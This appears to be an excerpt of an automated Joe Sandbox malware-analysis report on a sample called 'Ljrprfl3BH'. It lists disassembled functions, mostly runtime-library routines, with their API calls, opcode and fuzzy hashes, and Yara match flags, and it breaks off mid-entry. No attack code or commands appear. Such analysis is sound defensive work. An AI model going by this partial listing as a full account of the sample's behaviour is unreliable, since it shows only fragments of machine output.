                                                                            Similarity
                                                                            • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                            • String ID: <(@
                                                                            • API String ID: 3213686812-4189137628
                                                                            • Opcode ID: 66e0b01c820f3c016cb479e2b3e6a53e6d0229a994ecfa947a89fafbf06fb01a
                                                                            • Instruction ID: c42ad4fc6a3a459dd0b6f73910b388841d309234efd3d08c580d18ad64b54486
                                                                            • Opcode Fuzzy Hash: 66e0b01c820f3c016cb479e2b3e6a53e6d0229a994ecfa947a89fafbf06fb01a
                                                                            • Instruction Fuzzy Hash: CCF02761B8432635FA2037B27D0BBAB19150F14B0DF96003FFF0A995C3DEAC955040AD
                                                                            APIs
                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,00431F4D), ref: 0042DF89
                                                                            • GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
                                                                            • ExitThread.KERNEL32 ref: 0042DFCA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                            • String ID: <(@
                                                                            • API String ID: 3213686812-4189137628
                                                                            • Opcode ID: 7b487a85bde145f5f6618f4d2cac6f1d463b179069c0564edcd31255594901e1
                                                                            • Instruction ID: 8d9534a8efac39963163d02413269ee71f33911fb9a211fcd458cde81c8fda17
                                                                            • Opcode Fuzzy Hash: 7b487a85bde145f5f6618f4d2cac6f1d463b179069c0564edcd31255594901e1
                                                                            • Instruction Fuzzy Hash: 08F0A061B8431635FA203BA1BD0BB9619254F14B09F56002BBE0AA95D2DAA9955041AD
                                                                            APIs
                                                                            • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242E9
                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004242FB
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00424309
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                                            • String ID: pScheduler
                                                                            • API String ID: 1381464787-923244539
                                                                            • Opcode ID: 27a4b28832b8d2c4d1e169b8d68e757cb4f39c4e60a74ca0ff363d542ca72071
                                                                            • Instruction ID: 0ab47ed57e3114165a5b8518f1ff4cdc14a790a58e52e99d458785ee7c9320ad
                                                                            • Opcode Fuzzy Hash: 27a4b28832b8d2c4d1e169b8d68e757cb4f39c4e60a74ca0ff363d542ca72071
                                                                            • Instruction Fuzzy Hash: E7F0A731B01224A7CB18FB56E852D9E73A99E40304791826FF806A3182DFBCA948C65D
                                                                            APIs
                                                                            • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E62F
                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E642
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E650
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                                            • String ID: pContext
                                                                            • API String ID: 1990795212-2046700901
                                                                            • Opcode ID: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
                                                                            • Instruction ID: 74844cc6af7f8c94541e855de6513edd01ccc4ed259e70f51b8aa0ea99782ad2
                                                                            • Opcode Fuzzy Hash: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
                                                                            • Instruction Fuzzy Hash: 9EE06139B0011427CB04FB65DC06C5DB7A8AEC0714390413BF905A3381DFB8AD0585CC
                                                                            APIs
                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DAA
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DB8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                            • String ID: pScheduler$version
                                                                            • API String ID: 1687795959-3154422776
                                                                            • Opcode ID: 464dda17272c5f92190f115bd46177522cd506029ea0a62d1c7ec35c5c4aaa01
                                                                            • Instruction ID: 78896325b6b5d70010e1ee9e49f38da00e370817edf74f3b448257e365f7b275
                                                                            • Opcode Fuzzy Hash: 464dda17272c5f92190f115bd46177522cd506029ea0a62d1c7ec35c5c4aaa01
                                                                            • Instruction Fuzzy Hash: 99E08630900608F6CB14EE56D80EBDD77A45B51749F61C1277819610929BBC96C8CB4E
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: __alldvrm$_strrchr
                                                                            • String ID:
                                                                            • API String ID: 1036877536-0
                                                                            • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                            • Instruction ID: bca4f3389f7aef3b321b47e138c454c1308b116cb1c02f017d73c82a305e3271
                                                                            • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                            • Instruction Fuzzy Hash: 65A14872A00B869FEB15DE18C8917AEFBE1EF19310F28426FD5859B381C23C9D41C759
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __alldvrm$_strrchr
                                                                            • String ID:
                                                                            • API String ID: 1036877536-0
                                                                            • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                            • Instruction ID: 8d62beb1adc3f80bbab8f3ff7ee514620481ec22d32c73fd462dc8bab3129a13
                                                                            • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                            • Instruction Fuzzy Hash: B6A167B998038AAFD725CF18C8907BEBFA7EF61310F7442ADD595AB241C335A941CB50
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: _free
                                                                            • String ID:
                                                                            • API String ID: 269201875-0
                                                                            • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                            • Instruction ID: f2494f1ef04ef44517cd1171a85dede66e5513e309315ffa42068036143921cc
                                                                            • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                            • Instruction Fuzzy Hash: 57410771E00210ABDB257BBADC42AAF7664EF5E374F14127FF41882391D73C590946A9
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free
                                                                            • String ID:
                                                                            • API String ID: 269201875-0
                                                                            • Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                            • Instruction ID: 4b91c0ab3ff7685d7bb408c0254f753362673b944464205b3041dd9e3fec203e
                                                                            • Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                            • Instruction Fuzzy Hash: 2B412739AC01046FDB256EB88C44BFE3BB7EF25770F34061EF42996690D77284428AA1
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,021C046A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 021C6B41
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 021C6BCA
                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 021C6BDC
                                                                            • __freea.LIBCMT ref: 021C6BE5
                                                                              • Part of subcall function 021C38FE: RtlAllocateHeap.NTDLL(00000000,0219DACD,00000000), ref: 021C3930
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                            • String ID:
                                                                            • API String ID: 2652629310-0
                                                                            • Opcode ID: 6691954612650c490b0f1db7a760fe6ab7f85cafeb43cd7dd41aaf3ed81f1cf0
                                                                            • Instruction ID: 935c1ebc8555081246bcda4e0c104f30ee0ea0ae472c94692e5a3a946473a6f9
                                                                            • Opcode Fuzzy Hash: 6691954612650c490b0f1db7a760fe6ab7f85cafeb43cd7dd41aaf3ed81f1cf0
                                                                            • Instruction Fuzzy Hash: B031EF76A4024AAFDF258F64CC81EAE7BA9EF94714F24026CEC04D7190E735D950CBA0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Xtime_diff_to_millis2_xtime_get
                                                                            • String ID:
                                                                            • API String ID: 531285432-0
                                                                            • Opcode ID: 9c244af1b80992c8c5c11ff33a9a240242c4a027173cbb81dbc6de2572cd5d43
                                                                            • Instruction ID: d103751f5e86bb577f21b0ef41fc0747bac1fbbf4bb65c452d8b20089be38efe
                                                                            • Opcode Fuzzy Hash: 9c244af1b80992c8c5c11ff33a9a240242c4a027173cbb81dbc6de2572cd5d43
                                                                            • Instruction Fuzzy Hash: A7217C75E0021A9FDF00EFA5CC829AEB7B8EF09714F10007AF901B7291D778AD058BA5
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Xtime_diff_to_millis2_xtime_get
                                                                            • String ID:
                                                                            • API String ID: 531285432-0
                                                                            • Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                            • Instruction ID: 07f981ec5a45fa94a30c69bc2dcba807f28e809ca30754f6efb87dde0df302d9
                                                                            • Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                            • Instruction Fuzzy Hash: 9A215E75E40209AFDF04EFA4DD819BEB7B9EF09714F100066E506B7250DB74AD028FA1
                                                                            APIs
                                                                            • SetEvent.KERNEL32(?,00000000), ref: 00423729
                                                                            • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423711
                                                                              • Part of subcall function 0041B71C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B73D
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0042375A
                                                                            • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423783
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                                            • String ID:
                                                                            • API String ID: 2630251706-0
                                                                            • Opcode ID: 0708c55e9bf2983c6b837536b85e823e81494798a28270a3cf60b9b0231776e7
                                                                            • Instruction ID: fbbc1a7e5a16338d661a11365c58371bffdd4c48ac4c368ddaba424d9e7313e5
                                                                            • Opcode Fuzzy Hash: 0708c55e9bf2983c6b837536b85e823e81494798a28270a3cf60b9b0231776e7
                                                                            • Instruction Fuzzy Hash: 5911E9747002146BCF04AF659C85DAEB765EB84761B144067FA059B392CBAC9D41C698
                                                                            APIs
                                                                            • ShowWindow.USER32(00000005), ref: 00401FA5
                                                                            • UpdateWindow.USER32 ref: 00401FAD
                                                                            • ShowWindow.USER32(00000000), ref: 00401FC1
                                                                            • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 00402024
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Show$MoveUpdate
                                                                            • String ID:
                                                                            • API String ID: 1339878773-0
                                                                            • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                            • Instruction ID: 53ee9dd5e88c5c6849e3e7895ae91ae42f7fd804de43801a61d80981d891571f
                                                                            • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                            • Instruction Fuzzy Hash: 90016531E006109BC7258F19ED04A267BA7FFD5712B15803AF40C972B1D7B1AC428B9C
                                                                            APIs
                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 004290D3
                                                                              • Part of subcall function 00429020: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042904F
                                                                              • Part of subcall function 00429020: ___AdjustPointer.LIBCMT ref: 0042906A
                                                                            • _UnwindNestedFrames.LIBCMT ref: 004290E8
                                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 004290F9
                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 00429121
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                            • String ID:
                                                                            • API String ID: 737400349-0
                                                                            • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                            • Instruction ID: 9a28eba3c49a40873050ba514f30250a61a7a586528b59ff06f814ea835fedb3
                                                                            • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                            • Instruction Fuzzy Hash: 55014032200159BBDF116E96EC41EEB7F7AEF48758F444009FE4896121C73AEC61DBA8
                                                                            APIs
                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 021B933A
                                                                              • Part of subcall function 021B9287: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 021B92B6
                                                                              • Part of subcall function 021B9287: ___AdjustPointer.LIBCMT ref: 021B92D1
                                                                            • _UnwindNestedFrames.LIBCMT ref: 021B934F
                                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 021B9360
                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 021B9388
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                            • String ID:
                                                                            • API String ID: 737400349-0
                                                                            • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                            • Instruction ID: d747b5d6c9cfe88238f259033aebc914725fbd842b3210c41f2ecc8c044c4fe8
                                                                            • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                            • Instruction Fuzzy Hash: 9C01D772540149BFDF126EA5CC41EEB7F7AEF99754F054014FE08A6120D736E8629FA0
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue), ref: 00434F51
                                                                            • GetLastError.KERNEL32(?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431F9C), ref: 00434F5D
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F6B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad$ErrorLast
                                                                            • String ID:
                                                                            • API String ID: 3177248105-0
                                                                            • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                            • Instruction ID: 0dde809cff85efe1a06f082dffa05588a2f4c4b6f5b2494ffdd5bda6add1d188
                                                                            • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                            • Instruction Fuzzy Hash: 3401FC36615322AFC7214F69AC449A77B98AF89FA1F241531F905D7240D724E90186E8
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,021C512D,00000000,00000000,00000000,00000000,?,021C53E5,00000006,0044A378), ref: 021C51B8
                                                                            • GetLastError.KERNEL32(?,021C512D,00000000,00000000,00000000,00000000,?,021C53E5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,021C2203), ref: 021C51C4
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,021C512D,00000000,00000000,00000000,00000000,?,021C53E5,00000006,0044A378,0044A370,0044A378,00000000), ref: 021C51D2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LibraryLoad$ErrorLast
                                                                            • String ID:
                                                                            • API String ID: 3177248105-0
                                                                            • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                            • Instruction ID: 697293bad49e89792954dc38d39f9538946e6dc4713b44eee10b1a481d8edb47
                                                                            • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                            • Instruction Fuzzy Hash: 6D01FC3E6512227BC7214F699C4CA5A7799AF26FA27710638F906F7340C720E501C6E4
                                                                            APIs
                                                                            • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426138
                                                                            • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042614C
                                                                            • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426164
                                                                            • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042617C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                            • String ID:
                                                                            • API String ID: 78362717-0
                                                                            • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                            • Instruction ID: ba6f451568feed0ad97d4c35bc03da7052fef1102373e57c37541bd94dea7e10
                                                                            • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                            • Instruction Fuzzy Hash: DD01F236700224A7CF16AE5AA811AFFB7A99F80354F41005BFC11A7282DE24FD2192A8
                                                                            APIs
                                                                            • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 021B639F
                                                                            • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 021B63B3
                                                                            • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 021B63CB
                                                                            • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 021B63E3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                            • String ID:
                                                                            • API String ID: 78362717-0
                                                                            • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                            • Instruction ID: 8f431a2140fce37545d2f093f64c55f6cbae9588a1af7dcda96bd3ab20708b86
                                                                            • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                            • Instruction Fuzzy Hash: E201F936640524BBDF17EE69D850EEF77BE9FA5350F010055EC29A7291DB70ED108AA0
                                                                            APIs
                                                                            • Concurrency::location::_Assign.LIBCMT ref: 021B2BA1
                                                                            • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 021B2BBF
                                                                              • Part of subcall function 021A8677: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 021A8698
                                                                              • Part of subcall function 021A8677: Hash.LIBCMT ref: 021A86D8
                                                                            • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 021B2BC8
                                                                            • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 021B2BE8
                                                                              • Part of subcall function 021AF6CF: Hash.LIBCMT ref: 021AF6E1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                            • String ID:
                                                                            • API String ID: 2250070497-0
                                                                            • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                            • Instruction ID: 1f81ef80bc8175b8a46f1b32d256febbc26edd4c6429ffdca187e8cb31ea7506
                                                                            • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                            • Instruction Fuzzy Hash: 26118E76800600AFC715EFA4C890EDAF7F9BF19310F004A5EE95AC7551DB70E904CBA0
                                                                            APIs
                                                                            • Concurrency::location::_Assign.LIBCMT ref: 021B2BA1
                                                                            • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 021B2BBF
                                                                              • Part of subcall function 021A8677: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 021A8698
                                                                              • Part of subcall function 021A8677: Hash.LIBCMT ref: 021A86D8
                                                                            • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 021B2BC8
                                                                            • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 021B2BE8
                                                                              • Part of subcall function 021AF6CF: Hash.LIBCMT ref: 021AF6E1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                            • String ID:
                                                                            • API String ID: 2250070497-0
                                                                            • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                            • Instruction ID: bb83c98e8ada3d0c09bdaef9b0c8f1d985bf74e5ff105a6434a229ea9e95d37d
                                                                            • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                            • Instruction Fuzzy Hash: EB011776400604AFC725EFA9C891EDAF7F9AF58310B008A1EE55A87650DB71F944CBA0
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 0040591C
                                                                              • Part of subcall function 0040BB3D: __EH_prolog3_GS.LIBCMT ref: 0040BB44
                                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405967
                                                                            • __Getcoll.LIBCPMT ref: 00405976
                                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405986
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                            • String ID:
                                                                            • API String ID: 1836011271-0
                                                                            • Opcode ID: b945d4fba948faf335eba6a26c9d16208f5764ada45908dbcbdd3d34a3e84dcb
                                                                            • Instruction ID: 7de8e0425e838f52bf763386e227ca4e4c8dd97e461cbe55c35c0d0d082d521b
                                                                            • Opcode Fuzzy Hash: b945d4fba948faf335eba6a26c9d16208f5764ada45908dbcbdd3d34a3e84dcb
                                                                            • Instruction Fuzzy Hash: 61011771910209DFDB10EFA5C486B9DB7B0EF04329F10843EE459BB681DB789549CF99
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 021950C7
                                                                              • Part of subcall function 0219BDA4: __EH_prolog3_GS.LIBCMT ref: 0219BDAB
                                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 02195112
                                                                            • __Getcoll.LIBCPMT ref: 02195121
                                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 02195131
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                            • String ID:
                                                                            • API String ID: 1836011271-0
                                                                            • Opcode ID: aff552bf37bfddc61d9e477734a816809d81299120f6a55e324a792514706cbd
                                                                            • Instruction ID: a91b5ea83b07efe2aa53435eea97e3642d084586609bb8f6c95d7446cb38e67c
                                                                            • Opcode Fuzzy Hash: aff552bf37bfddc61d9e477734a816809d81299120f6a55e324a792514706cbd
